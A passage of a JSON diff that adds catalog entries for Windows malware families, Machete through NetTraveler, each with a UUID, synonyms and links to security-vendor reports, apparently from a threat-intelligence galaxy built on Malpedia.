+ "value": "Machete", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", + "https://www.arbornetworks.com/blog/asert/mad-max-dga/" + ] + }, + "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", + "value": "MadMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", + "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" + ] + }, + "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", + "value": "Magala", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", + "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://www.youtube.com/watch?v=lqWJaaofNf4", + "http://asec.ahnlab.com/1124" + ] + }, + "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", + "value": "Magniber", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", + "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" + ] + }, + "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", + "value": "MajikPos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", + "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", + "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" + ] + }, + "uuid": "996e73e9-b093-4987-9992-f52008e55b24", + "value": "Makadocs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", + "https://twitter.com/James_inthe_box/status/1046844087469391872" + ] + }, + "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", + "value": "MakLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", + "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", + 
"https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", + "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" + ] + }, + "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", + "value": "Maktub", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", + "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" + ] + }, + "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", + "value": "MalumPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HDDCryptor", + "DiskCryptor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", + "https://securelist.com/the-return-of-mamba-ransomware/79403/" + ] + }, + "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", + "value": "Mamba", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptoHost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", + "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", + "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" + ] + }, + "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", + "value": "ManameCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "junidor", + "mengkite", + "vedratve" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + ] + }, + "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", + "value": "Mangzamel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], 
+ "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", + "https://twitter.com/struppigel/status/811587154983981056" + ] + }, + "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", + "value": "Manifestus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", + "value": "ManItsMe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", + "value": "MAPIget", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" + ] + }, + "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", + "value": "Marap", + "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", + "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" + ] + }, + "uuid": "59717468-271e-4d15-859a-130681c17ddb", + "value": "Matrix Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" + ] + }, + "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", + "value": "Matrix Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", + "value": "Matryoshka RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", + "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" + ] + }, + "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", + "value": "Matsnu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DexLocker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", + "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", + "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", + "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", + "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" + ] + }, + "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", + "value": "MBRlock", + "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." 
+ }, + { + "meta": { + "synonyms": [ + "MyBios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", + "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", + "https://www.symantec.com/connect/blogs/bios-threat-showing-again", + "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", + "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" + ] + }, + "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", + "value": "Mebromi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", + "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" + ] + }, + "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", + "value": "Medre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", + "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", + "https://news.drweb.com/show/?i=10302&lng=en", + "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", + "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" + ] + }, + "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", + "value": "win.medusa", + "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" + ] + }, + "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", + "value": "Mewsei", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", + "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" + ] + }, + "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", + "value": "Miancha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", + "value": "Micrass", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", + "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", + "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" + ] + }, + "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", + "value": "Microcin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" + ] + }, + "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", + "value": "Micropsia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + ] + }, + "uuid": 
"87abb59d-0012-4d45-9e75-136372b25bf8", + "value": "Mikoponi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", + "value": "MILKMAID", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", + "https://github.com/gentilkiwi/mimikatz", + " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", + "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" + ] + }, + "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", + "value": "MimiKatz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", + "value": "MiniASP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", + "value": "Mirage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", + "value": "MirageFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", + "https://twitter.com/PhysicalDrive0/status/830070569202749440", + "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", + "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + ] + }, + "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", + "value": "Misdat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MixFox", + "ModPack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + ] + }, + "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", + "value": "Misfox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" + ] + }, + "uuid": "4c786624-4a55-46e6-849d-b65552034235", + "value": "Miuref", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", + "value": "MM Core", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", + "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" + ] + }, + "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", + "value": "MobiRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" + ] + }, + "uuid": 
"7132c1de-9a3f-4f08-955f-ab6f7a09e17d", + "value": "Mocton", + "description": "" + }, + { + "meta": { + "synonyms": [ + "straxbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", + "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", + "https://twitter.com/physicaldrive0/status/670258429202530306" + ] + }, + "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", + "value": "ModPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", + "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", + "https://breakingmalware.com/malware/moker-part-2-capabilities/", + "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", + "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" + ] + }, + "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", + "value": "Moker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", + "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", + "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" + ] + }, + "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", + "value": "Mole", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", + "http://www.clearskysec.com/iec/", + 
"https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" + ] + }, + "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", + "value": "Molerat Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoinMiner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", + "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" + ] + }, + "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", + "value": "Monero Miner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ] + }, + "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", + "value": "MoonWind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" + ] + }, + "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", + "value": "Morphine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", + "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", + "https://www.f-secure.com/weblog/archives/00002227.html", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" + ] + }, + "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", + "value": "Morto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" + ] + }, + "uuid": 
"663df641-d396-4e93-93bd-bb9609ceb0ba", + "value": "Mosquito", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" + ] + }, + "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", + "value": "Moure", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", + "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" + ] + }, + "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", + "value": "mozart", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", + "value": "MPK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", + "value": "MPKBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" + ] + }, + "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", + "value": "Multigrain POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", + 
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", + "value": "murkytop", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" + ] + }, + "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", + "value": "Murofet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", + "http://vms.drweb.ru/virus/?_is=1&i=8477920" + ] + }, + "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", + "value": "Mutabaha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", + "value": "MyKings Spreader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", + "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" + ] + }, + "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", + "value": "MyloBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + ] + }, + "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", + "value": "N40", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" + ] + }, + "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", + "value": "Nabucur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", + "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" + ] + }, + "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", + "value": "Nagini", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + ] + }, + "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", + "value": "Naikon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", + "value": "Nanocore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" + ] + }, + "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", + "value": "NanoLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", + "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", + "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" + ] + }, + "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", + "value": "Narilam", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "d8295eba-60ef-4900-8091-d694180de565", + "value": "Nautilus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" + ] + }, + "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", + "value": "NavRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nucurs" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", + "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", + "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", + "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", + "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", + "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", + "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/" + ] + }, + "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", + "value": "Necurs", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nemain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", + "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" + ] + }, + "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", + "value": "Nemim", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", + "value": "NetC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ScoutEagle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", + "value": "NETEAGLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", + "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" + ] + }, + "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", + "value": "Netrepser", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", + "http://www.netsupportmanager.com/index.asp", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" + ] + }, + "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", + "value": "NetSupportManager RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TravNet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", + "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", + "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" + ] + }, + "uuid": 